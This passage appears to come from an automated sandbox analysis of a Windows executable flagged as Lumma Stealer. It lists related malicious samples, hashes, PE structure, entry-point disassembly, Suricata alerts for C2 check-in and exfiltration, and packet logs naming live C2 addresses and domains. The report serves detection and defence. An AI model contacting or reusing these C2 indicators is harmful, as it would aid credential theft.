                                                                                                                                                                                                                                                                                      v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      sendypaster.xyzWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      steppriflej.xyzWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      steamcommunity.comWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                      LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                      ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                      Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      AKAMAI-ASN1EUWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 172.237.152.235
                                                                                                                                                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                      • 23.211.121.53
                                                                                                                                                                                                                                                                                      nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 172.233.106.253
                                                                                                                                                                                                                                                                                      nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 172.227.252.37
                                                                                                                                                                                                                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                      • 23.215.103.199
                                                                                                                                                                                                                                                                                      nsharm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 23.1.235.104
                                                                                                                                                                                                                                                                                      nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 23.44.132.66
                                                                                                                                                                                                                                                                                      BITWEB-ASRUWonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.9
                                                                                                                                                                                                                                                                                      https://mdgouv.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.14
                                                                                                                                                                                                                                                                                      11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      https://courtscali.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.14
                                                                                                                                                                                                                                                                                      18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                                      • 193.143.1.231
                                                                                                                                                                                                                                                                                      CLOUDFLARENETUStg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                                                                                                                      setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 172.67.164.25
                                                                                                                                                                                                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.19.35
                                                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.151.193
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.191.144

                                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                      \Device\ConDrv

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:OP5n:Ox
                                                                                                                                                                                                                                                                                      MD5:32EB8D44A0938FBB8E8E87029CA719D8
                                                                                                                                                                                                                                                                                      SHA1:13856311E78A959973D96B17544931AF22347E61
                                                                                                                                                                                                                                                                                      SHA-256:C769F4AA36C38983F94D6F4599EE0A3623EC8D244969B9A1E4F4B91E86C0FF9F
                                                                                                                                                                                                                                                                                      SHA-512:A6895D557270E69BE20349875587783B310B1B5A6922643FEA92875AD3D0899BB7B08F6F2206DE97194DA6DB9DDA1DC4AAE7759ED5684D18B36B9ECEDF0EAEDC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:Enjoy!..

                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.528630059997768
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:Launcher_x64.exe
                                                                                                                                                                                                                                                                                      File size:575'488 bytes
                                                                                                                                                                                                                                                                                      MD5:a467477e289901e8c45912f98fc56cd2
                                                                                                                                                                                                                                                                                      SHA1:15be8446db31a669ee930bedf992ef558b121f7f
                                                                                                                                                                                                                                                                                      SHA256:6a8a3c7873b18093245e953808bef419d56ba8d103eab96d276111ef59992c6f
                                                                                                                                                                                                                                                                                      SHA512:3258d0d391def6a9a5da0385f6913a34c8df97c4669db14f5aa9516d2e2c619a40fbac5fa3db47f9caf9283f08763ea8b63d53f40933bdff41a92fcc0bc4b234
                                                                                                                                                                                                                                                                                      SSDEEP:12288:dRIomkRJWzi7X+UeyZAU2kMCasPakyFqb80b0akd5:de/kRJWzib+UnApkasHyFKJbwd5
                                                                                                                                                                                                                                                                                      TLSH:52C4D1017541C073DDA722B364BAD7AA4629F9100F626ACFA3580DBDDF351D1AB32B27
                                                                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.......................... ............@.....................................<..

                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Entrypoint:0x4170bb
                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                      Import Hash:1f5f01fd52677b24724028ad24992aa9

                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      call 00007F06D0D372EAh
                                                                                                                                                                                                                                                                                      jmp 00007F06D0D37159h
                                                                                                                                                                                                                                                                                      mov ecx, dword ptr [00440700h]
                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                      mov edi, BB40E64Eh
                                                                                                                                                                                                                                                                                      mov esi, FFFF0000h
                                                                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                                                                      je 00007F06D0D372E6h
                                                                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                                                                      jne 00007F06D0D37308h
                                                                                                                                                                                                                                                                                      call 00007F06D0D37311h
                                                                                                                                                                                                                                                                                      mov ecx, eax
                                                                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                                                                      jne 00007F06D0D372E9h
                                                                                                                                                                                                                                                                                      mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                                                      jmp 00007F06D0D372F0h
                                                                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                                                                      jne 00007F06D0D372ECh
                                                                                                                                                                                                                                                                                      or eax, 00004711h
                                                                                                                                                                                                                                                                                      shl eax, 10h
                                                                                                                                                                                                                                                                                      or ecx, eax
                                                                                                                                                                                                                                                                                      mov dword ptr [00440700h], ecx
                                                                                                                                                                                                                                                                                      not ecx
                                                                                                                                                                                                                                                                                      pop edi
                                                                                                                                                                                                                                                                                      mov dword ptr [00440740h], ecx
                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                                                      sub esp, 14h
                                                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                                      xorps xmm0, xmm0
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                                                      call dword ptr [0043D914h]
                                                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                      call dword ptr [0043D8CCh]
                                                                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                      call dword ptr [0043D8C8h]
                                                                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      call dword ptr [0043D964h]
                                                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                      xor eax, ecx
                                                                                                                                                                                                                                                                                      leave
                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                      mov eax, 00004000h
                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                      push 00441E50h
                                                                                                                                                                                                                                                                                      call dword ptr [0043D93Ch]
                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                      push 00030000h
                                                                                                                                                                                                                                                                                      push 00010000h
                                                                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                                                                      call 00007F06D0D3E918h
                                                                                                                                                                                                                                                                                      add esp, 0Ch

                                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d6b40x3c.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x910000x3e8.rsrc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x2324.reloc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x399680x18.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35cf80xc0.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x3d8600x170.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                      .text0x10000x326cc0x32800ccc71f71555262d04b28eeb13f33c694False0.5078125data6.449171689149143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .rdata0x340000xad9c0xae00265ca2e098c45dacae5fa86d5b3aa7cbFalse0.4167789152298851locale data table4.866718139159974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .data0x3f0000x36180x260034a18fbac611bd450c331e8e8b0fc570False0.31270559210526316data5.125689677633356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .tls0x430000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .reloc0x440000x23240x2400a5356144ed5fdf31d774488bfaa21264False0.7392578125data6.496424389763303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .bss0x470000x49c000x49c00ae225876e09ff8a537f78908156a8879False1.0003343485169491OpenPGP Secret Key7.999366161518412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .rsrc0x910000x3e80x40064acc37535b725263869df252fd47b49False0.43359375data3.281274144562883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                      RT_VERSION0x910580x390dataEnglishUnited States0.4517543859649123

                                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                      KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                                                      USER32.dllDefWindowProcW

                                                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                      2024-12-23T01:17:04.741497+01002058212ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)1192.168.2.4619021.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T01:17:36.641324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730193.143.1.9443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:08.625788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737193.143.1.9443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:11.813791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976523.55.153.106443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:12.592732+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44976523.55.153.106443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:14.333543+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449772172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:14.989615+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449772172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:14.989615+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449772172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:16.240837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449777172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:17.048776+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449777172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:17.048776+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449777172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:18.700426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449784172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:19.696798+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449784172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:21.007739+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449790172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:23.182176+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449795172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:25.967597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449801172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:28.978081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449807172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T01:18:32.629372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449818172.67.157.254443TCP

                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.308655977 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.308720112 CET44349730193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.308849096 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.314811945 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.314827919 CET44349730193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:36.641324043 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.036072969 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.036122084 CET44349737193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.036226988 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.036561012 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.036586046 CET44349737193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.625787973 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.421744108 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.421802044 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.421897888 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.422275066 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.422296047 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.813694000 CET4434976523.55.153.106192.168.2.4
